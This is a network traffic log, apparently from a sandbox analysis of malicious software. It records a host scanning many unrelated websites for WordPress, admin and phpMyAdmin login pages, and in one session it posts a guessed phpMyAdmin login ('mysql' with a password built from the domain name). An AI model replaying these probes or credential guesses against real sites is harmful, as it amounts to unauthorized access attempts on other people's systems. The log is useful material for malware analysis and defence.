2024-02-20 23:26:15 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_jsklPy/pefJJkEUtnhpYzCnYVlsCWoVopURJxr01MpvJKd8Mk7lZvbC5zndSbo/iSC5ssocP8JTeobnxjv1cEQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:15 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
193	192.168.2.6	64745	75.2.70.75	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	173	OUT	GET /wp-login.php HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	184	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/wp-login.php
2024-02-20 23:26:16 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
194	192.168.2.6	64746	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	183	OUT	GET /wp-login.php HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	408	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 set-cookie: wordpress_test_cookie=WP+Cookie+check; path=/; secure x-frame-options: SAMEORIGIN content-length: 5377 date: Tue, 20 Feb 2024 23:26:16 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:16 UTC	5377	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 2c 20 6e 6f 69 6e 64 65 78 2c 20 6e 6f 61 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; norwegischlernen.info — WordPress</title><meta name='robots' content='max-image-preview:large, noindex, noa

Session ID	Source IP	Source Port	Destination IP	Destination Port
195	192.168.2.6	64771	13.248.169.48	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:15 UTC	173	OUT	GET /admin.php HTTP/1.1 Host: acidvision.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:15 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:15 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_RNF5MLJu7U4GVPMKJmgBI95AW4E2z4quVavgIh81asC7i9vD06s0ZBDz8KFfFUlQu8vrQpbN/q3miHqV/0xpoA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:15 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
196	192.168.2.6	64957	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	216	OUT	GET / HTTP/1.1 Host: www.stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip Cookie: PHPSESSID=oj6p6lfvhecu1oc8sf9095ke5t User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	360	IN	HTTP/1.1 301 Moved Permanently Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://sell.sawbrokers.com/domain/stylesense.co.uk/
2024-02-20 23:26:16 UTC	13	IN	Data Raw: 33 0d 0a 20 20 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 3 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
197	192.168.2.6	64972	3.33.130.190	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	167	OUT	GET /pma/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_TGBCUoI70UOPREqWU/lpmEsuxoRbkRf9Wo3Bzi6zCGl39h/x+15SZ304SF2e33cvz5gBgpSU7i0+9/xwS4vu6A Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:16 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
198	192.168.2.6	64988	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	169	OUT	GET /admin.php HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_DVOY5aH+pPCDCieUcPyLjLTV/S4LiIbVEFWTn9M/aUB/xd8WxI8hJaxSdXmQcT2btQTM/++N1jQ82R96AwhZWA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:16 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
199	192.168.2.6	65018	144.91.85.110	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	171	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: m-viper.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	189	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Content-Length: 146 Connection: close Vary: Accept-Encoding Vary: Accept-Encoding
2024-02-20 23:26:16 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
200	192.168.2.6	65189	13.248.243.5	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	207	OUT	GET /pma/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: dps_site_id=us-east-1 User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	288	IN	HTTP/1.1 404 Not Found Content-Type: text/html;charset=utf-8 Content-Length: 964 Vary: Accept-Encoding Server: DPS/2.0.0+sha-c81b86d X-Version: c81b86d X-SiteId: us-east-1 Set-Cookie: dps_site_id=us-east-1; path=/; secure Date: Tue, 20 Feb 2024 23:26:16 GMT Connection: close
2024-02-20 23:26:16 UTC	964	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxco

Session ID	Source IP	Source Port	Destination IP	Destination Port
201	192.168.2.6	65196	86.105.245.69	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	178	OUT	GET /wp-login.php HTTP/1.1 Host: stylesense.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	179	IN	HTTP/1.1 404 Not Found Server: openresty/1.21.4.1 Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html Content-Length: 159 Connection: close Vary: Accept-Encoding
2024-02-20 23:26:16 UTC	159	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
202	192.168.2.6	65408	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	398	OUT	POST /phpmyadmin/index.php?route=/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: phpMyAdmin_https=01pke3gn684j248r213vdkd9te; pma_lang_https=en User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/phpmyadmin/ Content-Length: 148 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:16 UTC	148	OUT	Data Raw: 72 6f 75 74 65 3d 25 32 46 26 6c 61 6e 67 3d 65 6e 26 74 6f 6b 65 6e 3d 37 61 34 64 37 38 36 64 32 39 34 36 34 66 33 62 33 30 33 64 35 39 32 34 32 38 33 66 33 39 37 64 26 73 65 74 5f 73 65 73 73 69 6f 6e 3d 30 31 70 6b 65 33 67 6e 36 38 34 6a 32 34 38 72 32 31 33 76 64 6b 64 39 74 65 26 70 6d 61 5f 75 73 65 72 6e 61 6d 65 3d 6d 79 73 71 6c 26 70 6d 61 5f 70 61 73 73 77 6f 72 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 73 65 72 76 65 72 3d 31 Data Ascii: route=%2F&lang=en&token=7a4d786d29464f3b303d5924283f397d&set_session=01pke3gn684j248r213vdkd9te&pma_username=mysql&pma_password=fortress%21&server=1
2024-02-20 23:26:17 UTC	1361	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:17 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: phpMyAdmin_https=a894pdvknb05cun0sc6cltkm6g; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: pmaAuth-1_https=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/phpmyadmin/; secure last-modified: Tue, 20 Feb 2024 23:26:17 GMT
2024-02-20 23:26:17 UTC	447	IN	Data Raw: 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 7a 46 51 44 45 4a 44 45 42 4e 33 6f 39 74 70 68 63 4a 48 57 37 45 52 44 25 32 46 35 35 31 6a 67 65 73 4f 62 59 6d 45 41 31 54 46 46 4e 36 33 67 6a 6a 56 65 4e 36 64 4b 79 6f 66 35 78 64 4d 47 70 79 48 53 54 67 45 4c 31 42 36 38 6f 79 72 61 44 4e 64 52 78 33 64 72 4e 4b 74 44 70 42 6f 75 42 41 30 71 50 4f 6d 49 25 32 46 50 38 31 46 6d 76 67 78 56 70 35 72 57 38 55 5a 62 69 74 73 75 39 69 45 59 25 32 46 63 4f 72 33 6b 57 6a 76 74 49 34 50 41 25 33 44 Data Ascii: CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zFQDEJDEBN3o9tphcJHW7ERD%2F551jgesObYmEA1TFFN63gjjVeN6dKyof5xdMGpyHSTgEL1B68oyraDNdRx3drNKtDpBouBA0qPOmI%2FP81FmvgxVp5rW8UZbitsu9iEY%2FcOr3kWjvtI4PA%3D
2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 34 39 31 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 4917<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
